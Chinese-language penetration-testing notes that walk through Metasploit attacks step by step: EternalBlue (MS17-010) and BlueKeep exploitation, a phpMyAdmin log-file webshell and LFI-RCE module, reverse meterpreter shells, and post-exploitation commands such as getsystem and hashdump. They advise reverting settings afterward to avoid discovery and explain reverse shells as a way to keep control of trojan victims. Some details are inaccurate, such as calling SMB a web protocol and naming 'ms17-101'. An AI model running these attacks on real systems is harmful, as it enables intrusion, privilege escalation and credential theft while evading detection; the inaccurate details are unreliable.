1,永恒之蓝:
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统可以执行任意代码。
SMB:Web协议中的一种,就是Web客户端去访问服务器端的一种协议。
使用MSF实现"永恒之蓝"的快速攻击,就是利用MSF中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。
2,实战漏洞利用:
1.phpAdmin日志写shell:
前提条件:用户是root
思路:
就是利用mysql的一个日志文件,这个日志文件每执行一个sql语句就会将其执行的语言保存。
我们将这个日志文件重命名为shell.php 然后去执行一个sql语句,带有一句话木马的命令。
然后再使用菜刀链接,就可以了。
设置导出文件:
general log OFF--ON
general log file 设置一个路径,执行sql语句,访问设置的路径即可。
参考文章:
注意:完成测试之后,需要将修改设置的地方,修改回来,以防被发现。
2.MSF获取Get Shell:
实战演示:phpMyAdmin
1.查找模块:earch name:phpmyadmin / search CVE-2018-12611
2.使用模块:use exploit/multi/http/phpmyadmin_lfi_rce
3.查看设置选项:options [rhosts、targeturl、password]
4.设置目标地址:set rhosts 127.0.0.1
5.设置目标范围:set targetrul phpMyAdmin
6.设置密码:set password root
7.选择payload:set payload php/meterpreter/reverse_tcp
8.查看设置选项:options [lhost]
9.设置本机地址:set lhost 127.0.0.2
10.开始攻击:run/exploit
3.永恒之蓝:
使用模块名:
auxiliary/scanner/smb/smb_ms17_010
exploit/windows/smb/ms17_010_eternalblue
1.查找模块:search ms17
2.使用模块:use auxiliary/scanner/smb/smb_ms17_010
3.查看设置选项options[rhosts]
4.设置目标地址:set rhosts 127.0.0.1
5.扫描一下:exploit,出现一个绿色的+号,说明易受攻击
6.使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue
7.查看设置选项:options [rhosts]
8.设置目标地址:set rhosts 127.0.0.1
9.设置payload:set payload windows/x64/meterpreter/reverse_tcp [64位的,因为靶机是64位的]
10.查看设置选项:options [lhost]
11.设置本地地址:set lhost 127.0.0.2
12.开始攻击:run
补充:
有的时候,在扫描靶机的时候,不会出现绿色+号
可以使用靶机和kali互相ping一下,看是否能ping通,如果ping不通
可以查看两个机器的ip是否在同一网段,将他们设置为同一个网段,如果还不行,将靶机防火墙关闭,试试。
蓝屏是计算机自动保护系统,存在一定几率出现蓝屏。
4.MSF永恒之蓝[实现蓝屏]:
Kali,MSF中没有这个:cve-2019-0708exploit
需要自己安装:git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce
需要自己配置;
1. 第一步,配置rdp.rb: 存放rdp.rb到 /usr/share/metasploit-framework/lib/msf/core/exploit 目录下
2. 第二步,配置rdp_scanner.rb :存放rdp_scanner.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下
3. 第三步,配置cve_2019_0708_bluekeep.rb:存放cve_2019_0708_bluekeep.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下
4. 第四步,配置cve_2019_0708_bluekeep_rce.rb:存放cve_2019_0708_bluekeep_rce.rb到/usr/share/metasploit-framework/modules/exploits/windows/rdp ------这里可能没有rdp这个文件夹,如果没有自己创建一个,到这里配置就完成了。
5.需要全部加载一下:reload_all [否则到时候可能读不到模块]
实现步骤:
1.使用辅助模块:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
2.设置目标地址:set rhosts 127.0.0.1
3.检测一下:run 出现绿色 + 号,易受攻击
4.使用攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
5.设置目标地址:set rhosts 127.0.0.1
6.设置端口:set rport 3389
7.查看攻击方式:show targets
8.我这里选择vmware 15 就是4 :set target 4
9.开始攻击:run
5.shell:
了解shell:
连接一般分为正向连接和反向链接:
正向连接:对方服务器开放端口,让我们去访问:
例如使用:telnet 127.0.0.1:80
反向链接:我们开放端口,让对方反问:
也就是让对方来找我们的端口,例如:反弹shell
反弹shell:
reverse shell,端口,被控端发起请求到该端口,并将其命令行的输入就是控制端监听在某TCP/UDP输出到控制端。
为什么要反弹shell:
1.某客户机中了你的网马,但是它在局域网内,你直接访问不了,它的IP会动态改变,你不能持续控制。
2.由于防火墙等限制,对方机器只能发送请求,不能接受请求。
3.对于病毒,木马受害者什么时候能中号,对方网络环境是什么样的,什么时候关机,都是未知,所以建立一个服务端,让而已程序主动连接,才是上策。
4.反弹很好理解:攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。
3,MSF会话常用命令:
通过反弹shell获得会话常用命令:
1.文件系统命令:
edit 编辑文件
getlwd 显示本地工作目录
Dir 列出目标文件目录
mkdir 创建目录
2.网络、系统命令:
ipconfig 显示网络接口信息
netstat 显示网络连接信息
execute 执行命令
ps 列出正在运行的进程
sysinfo 获取远程系统给的有关信息,例如os
3.用户界面命令:
getdesktop 获取当前的Meterpreter桌面
screenshot 获取目标桌面屏幕截图
4.提权、密码命令:
getsystem 尝试将你的权限提升为本地系统的权限
hashdump 获取目标NTLM-HASH值